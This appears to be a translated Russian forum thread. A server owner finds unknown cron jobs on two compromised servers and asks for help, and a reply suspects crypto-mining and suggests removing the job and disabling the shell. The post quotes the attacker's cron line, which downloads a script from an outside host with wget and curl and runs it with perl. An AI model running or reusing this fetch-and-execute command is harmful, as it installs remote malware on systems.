У меня есть два выделенных сервера, которые несколько дней назад начали присылать мне уведомления о неизвестных запущенных заданиях cron.
На обоих серверах у меня есть вторичные учетные записи для моих веб-сайтов, и хакер изменил задание cron для этих учетных записей, а не для root. Так что я думаю, что «возможно» у них есть только ограниченный доступ.
Оба пытаются запустить следующее: cd / tmp; wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt; rm -f abc *
Вывод Cronjob с первого сервера:
http://pastebin.com/m56ga6pp
Вывод Cronjob со второго сервера:
http://pastebin.com/4utZ8agC
Странно то, что оба сервера кажутся взломанными одновременно и с использованием одного и того же метода.
У кого-нибудь был именно такой хак, который может дать мне представление о том, как он попал и могу ли я удалить его без переустановки ..?
На серверах много веб-сайтов, и первый из них использует около 500 ГБ, что потребует много времени, чтобы переместить его в другое место и переустановить.
Заранее спасибо!
Глядя на вывод pastebin, кажется, что задания cron пытаются сгенерировать хэши, я подозреваю, что человек пытается использовать сервер как часть пула майнинга для криптовалюты.
Для получения подробной информации о том, как он вошел, нам потребуются различные журналы, и вы на 100% уверены, что это сделал не владелец веб-сайта? Вы можете легко удалить cronjob с помощью. crontab -e
Чтобы предотвратить возвращение человека в систему, я бы отключил доступ к оболочке для конкретного пользователя, если у него нет причин для этого. chsh -s /sbin/nologin {username}